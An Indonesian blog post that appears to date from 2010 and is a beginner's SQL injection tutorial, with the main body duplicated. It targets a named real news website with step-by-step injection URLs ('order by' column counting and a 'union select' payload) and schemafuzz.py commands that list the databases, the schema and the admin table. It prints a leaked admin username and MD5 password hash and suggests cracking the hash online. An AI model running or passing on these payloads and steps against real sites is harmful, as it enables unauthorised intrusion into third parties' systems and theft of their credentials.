Postingan
Sesuai dengan judul, sebenernya yang mau gw tulis ini basi banget..kalo kita coba cari di google, bejibun deh tutorial yang keluar...berhubung gw jg masi belajar, n kebiasaan gw orangnya lupaan. Jadi gw jadiin artikel ajah disini biar gw jg gag lupa...huehuehuehuehuehehehehehhe...jadi intinya itu tulisan ini KHUSUS diperuntukan ke neubi kek gw, untuk kk kk webmaster sekalian silahkan diliat ajah n dikoreksi kalo ada yang salah... =P
hwokehhh...jadi darimana nih dimulai...Yang perlu disiapin itu adalah...
1. PHYTON bisa di dongdot DISINI
2. SCHEMAFUZZ v.5 bisa di dongdot DISINI
3. COMMAND PROMPT...
4. ROKOK..
5. KOPI...
6. Anggur merah atau SEJENISNYA... =P
Yups..semua sudah tersedia??? Kita bisa mulai...Pertama2 kita cari dulu halaman web yang VULN atau halaman web yang apabila ditambahkan objek tambahan akan muncul pesan error. Kita belum masuk ke SCHEMAFUZZ yah, masi di browsing page...disini gw pake web
http://www.sligotoday.ie/details.php?id=5148
Udah ada kan web target...untuk manggil pesan error atau kata lainnya ngetest halaman web ini VULN atau tidak, kasi perintah ' atau - di belakang angka 5148. Yang harus diperhatikan disini [spasi] bisa sama saja dengan + ataupun %20 yah...jadi jangan heran kalo tiba2 kok spasinya gag ada atau berubah...
http://www.sligotoday.ie/details.php?id=-5148
Yang nantinya bakal nongol pesan error kayak gini...
Wokeh...setelah itu kita cari ada berapa sih column sql yang ada di web itu...perintahnya adalah order by n-- n yang dimaksud ini adalah angka yang diisi untuk ngecek ada berapa sih column yang ada. Perintah itu ditambahkan setelah -5148. Awalnya yang kita gunakan adalah n=1 dicari satu per satu sampai pesan error yang muncul berubah...contoh...
http://www.sligotoday.ie/details.php?id=-5148 order by 1--
http://www.sligotoday.ie/details.php?id=-5148 order by 2--
http://www.sligotoday.ie/details.php?id=-5148 order by 3--
terus dicoba n diganti angka belakangnya sampai pesan error berubah..disini pesan error berubah di angka 10 atau di URL
http://www.sligotoday.ie/details.php?id=-5148 order by 10--
Pesan Error yang muncul....
Nah berarti bisa diambil kesimpulan kalo web ini punya 9 column sql...Setelah itu kita cari ada dimana column yang bisa kita inject...Perintahnya pake Union Select perhatikan letak dimana Union Select itu ditempatkan
http://www.sligotoday.ie/details.php?id=-5148 union select 1,2,3,4,5,6,7,8,9--
nanti keliatan deh angka yang bisa di inject [angka 2..karena angka 2 ini beda sama yang lain..terlihat lebih besar]
Mungkin ada pertanyaan kok cuma sampe angka 9 yah???padahal ordernya itu sampe 10...Gw gag bisa jawab,takut salah... =P pokoknya kalo pesan errornya berubah, order terakhir itu jangan dimasukin ke angka2 di union select...
------------------------------------------
key sampe tahap ini baru kita mulai masuk ke SCHEMAFUZZ...udah diinstall kan???diperhatiin ya lokasi dimana SCHEMAFUZZ itu diinstall, contoh gw disini gw install di C:\>...kalo SCHEMAFUZZ itu gag bisa dieksekusi, berarti PHYTON nya lum diinstal...jangan lupa install PHYTON jg...
Ini perintah2 dasar yang ada di SCHEMAFUZZ atawa lengkapnya bisa dieksekusi di...
C:\>schemafuzz.py -h
--dbs [untuk mengetahui nama database sql]
--schema [untuk melihat nama tabel n nama column]
--dump [untuk melihat isi dari column]
Itu singkat gw tulis sesuai dengan urutan atau tahapan ngebedah tabel sql nya...
Yuk mulai...Ketik perintah
C:\>schemafuzz.py --dbs -u "[web yang terakhir tadi kita liat untuk ngeliat angka tabel]"
nanti dulu....jangan di enter..soalnya harus ada yang dirubah perintahnya...diangka yang tadi itu [disini kita gunain angka 2 yang muncul] dirubah jadi darkc0de [0 angka nol yah bukan huruf o]
C:\>schemafuzz.py --dbs -u "www.sligotoday.ie/details.php?id=-5148 union select 1,darkc0de,3,4,5,6,7,8,9"
Muncul kan tuh nama databasenya ada di tulisan Database: Sligotoday_news Tahap selanjutnya adalah ubah perintah --dbs jadi --schema n tambahin jg perintah -D [nama database] dibelakang url tadi... Perintah ini untuk ngeliat nama table n nama column...
C:\>schemafuzz.py --schema -u "www.sligotoday.ie/details.php?id=-5148 union select 1,darkc0de,3,4,5,6,7,8,9" -D sligotoday_news
Yups perhatikan baik2...paham kan mana Table n mana column...gw kasi sedikit deh...Cari n liat tulisan [table:column] dah ketemu... Nah yang nama2 table itu admin,adverts,articles,dll...terus yang nama column itu setelah : dari nama tabel.... key lanjut...cari tujuan utama kita mau liat apa???nama ADMIN n PASSWORD...Berarti table ama column yang kita mau eksekusi adalah admin:id,user,pass ... Ubah perintah --schema jadi --dump n tambahin perintah -T [nama table yang disini nama tablenya admin] -C [nama column yang disini nama columnnya id,user,admin] setelah -D sligotoday_news tadi... perintah ini untuk ngebuka nama admin n passwordnya...
C:\>schemafuzz.py --dump -u "www.sligotoday.ie/details.php?id=-5148 union select 1,darkc0de,3,4,5,6,7,8,9" -D sligotoday -T admin -C id,user,pass
WHooookkkeeeehhhhh...kebuka kan tuh isi dari column id,user,pass... 2[id]:Plunkett[user]:f0cc4a935326c97d7f46281e288a99e6[pass] huehuehuehehehhehehe...tapi passwordnya masi berupa MD5 Tinggal dicari liwat google... ^.^ Ciao...semoga tulisan ini bermanfaat yah...Biar gw jg gag lupa.... ^.^
hwokehhh...jadi darimana nih dimulai...Yang perlu disiapin itu adalah...
1. PHYTON bisa di dongdot DISINI
2. SCHEMAFUZZ v.5 bisa di dongdot DISINI
3. COMMAND PROMPT...
4. ROKOK..
5. KOPI...
6. Anggur merah atau SEJENISNYA... =P
Yups..semua sudah tersedia??? Kita bisa mulai...Pertama2 kita cari dulu halaman web yang VULN atau halaman web yang apabila ditambahkan objek tambahan akan muncul pesan error. Kita belum masuk ke SCHEMAFUZZ yah, masi di browsing page...disini gw pake web
http://www.sligotoday.ie/details.php?id=5148
Udah ada kan web target...untuk manggil pesan error atau kata lainnya ngetest halaman web ini VULN atau tidak, kasi perintah ' atau - di belakang angka 5148. Yang harus diperhatikan disini [spasi] bisa sama saja dengan + ataupun %20 yah...jadi jangan heran kalo tiba2 kok spasinya gag ada atau berubah...
http://www.sligotoday.ie/details.php?id=-5148
Yang nantinya bakal nongol pesan error kayak gini...
Wokeh...setelah itu kita cari ada berapa sih column sql yang ada di web itu...perintahnya adalah order by n-- n yang dimaksud ini adalah angka yang diisi untuk ngecek ada berapa sih column yang ada. Perintah itu ditambahkan setelah -5148. Awalnya yang kita gunakan adalah n=1 dicari satu per satu sampai pesan error yang muncul berubah...contoh...
http://www.sligotoday.ie/details.php?id=-5148 order by 1--
http://www.sligotoday.ie/details.php?id=-5148 order by 2--
http://www.sligotoday.ie/details.php?id=-5148 order by 3--
terus dicoba n diganti angka belakangnya sampai pesan error berubah..disini pesan error berubah di angka 10 atau di URL
http://www.sligotoday.ie/details.php?id=-5148 order by 10--
Pesan Error yang muncul....
Nah berarti bisa diambil kesimpulan kalo web ini punya 9 column sql...Setelah itu kita cari ada dimana column yang bisa kita inject...Perintahnya pake Union Select perhatikan letak dimana Union Select itu ditempatkan
http://www.sligotoday.ie/details.php?id=-5148 union select 1,2,3,4,5,6,7,8,9--
nanti keliatan deh angka yang bisa di inject [angka 2..karena angka 2 ini beda sama yang lain..terlihat lebih besar]
Mungkin ada pertanyaan kok cuma sampe angka 9 yah???padahal ordernya itu sampe 10...Gw gag bisa jawab,takut salah... =P pokoknya kalo pesan errornya berubah, order terakhir itu jangan dimasukin ke angka2 di union select...
------------------------------------------
key sampe tahap ini baru kita mulai masuk ke SCHEMAFUZZ...udah diinstall kan???diperhatiin ya lokasi dimana SCHEMAFUZZ itu diinstall, contoh gw disini gw install di C:\>...kalo SCHEMAFUZZ itu gag bisa dieksekusi, berarti PHYTON nya lum diinstal...jangan lupa install PHYTON jg...
Ini perintah2 dasar yang ada di SCHEMAFUZZ atawa lengkapnya bisa dieksekusi di...
C:\>schemafuzz.py -h
--dbs [untuk mengetahui nama database sql]
--schema [untuk melihat nama tabel n nama column]
--dump [untuk melihat isi dari column]
Itu singkat gw tulis sesuai dengan urutan atau tahapan ngebedah tabel sql nya...
Yuk mulai...Ketik perintah
C:\>schemafuzz.py --dbs -u "[web yang terakhir tadi kita liat untuk ngeliat angka tabel]"
nanti dulu....jangan di enter..soalnya harus ada yang dirubah perintahnya...diangka yang tadi itu [disini kita gunain angka 2 yang muncul] dirubah jadi darkc0de [0 angka nol yah bukan huruf o]
C:\>schemafuzz.py --dbs -u "www.sligotoday.ie/details.php?id=-5148 union select 1,darkc0de,3,4,5,6,7,8,9"
Muncul kan tuh nama databasenya ada di tulisan Database: Sligotoday_news Tahap selanjutnya adalah ubah perintah --dbs jadi --schema n tambahin jg perintah -D [nama database] dibelakang url tadi... Perintah ini untuk ngeliat nama table n nama column...
C:\>schemafuzz.py --schema -u "www.sligotoday.ie/details.php?id=-5148 union select 1,darkc0de,3,4,5,6,7,8,9" -D sligotoday_news
Yups perhatikan baik2...paham kan mana Table n mana column...gw kasi sedikit deh...Cari n liat tulisan [table:column] dah ketemu... Nah yang nama2 table itu admin,adverts,articles,dll...terus yang nama column itu setelah : dari nama tabel.... key lanjut...cari tujuan utama kita mau liat apa???nama ADMIN n PASSWORD...Berarti table ama column yang kita mau eksekusi adalah admin:id,user,pass ... Ubah perintah --schema jadi --dump n tambahin perintah -T [nama table yang disini nama tablenya admin] -C [nama column yang disini nama columnnya id,user,admin] setelah -D sligotoday_news tadi... perintah ini untuk ngebuka nama admin n passwordnya...
C:\>schemafuzz.py --dump -u "www.sligotoday.ie/details.php?id=-5148 union select 1,darkc0de,3,4,5,6,7,8,9" -D sligotoday -T admin -C id,user,pass
WHooookkkeeeehhhhh...kebuka kan tuh isi dari column id,user,pass... 2[id]:Plunkett[user]:f0cc4a935326c97d7f46281e288a99e6[pass] huehuehuehehehhehehe...tapi passwordnya masi berupa MD5 Tinggal dicari liwat google... ^.^ Ciao...semoga tulisan ini bermanfaat yah...Biar gw jg gag lupa.... ^.^
Anda baru saja membaca artikel yang berkategori dengan judul DASAR SQL Injection Dengan Schemafuzz. Anda bisa bookmark halaman ini dengan URL http://blogku-duniaku.blogspot.com/2010/01/dasar-sql-injection-dengan-schemafuzz.html. Terima kasih!
Ditulis oleh:
zenonk - Selasa, 26 Januari 2010
Belum ada komentar untuk "DASAR SQL Injection Dengan Schemafuzz"
Posting Komentar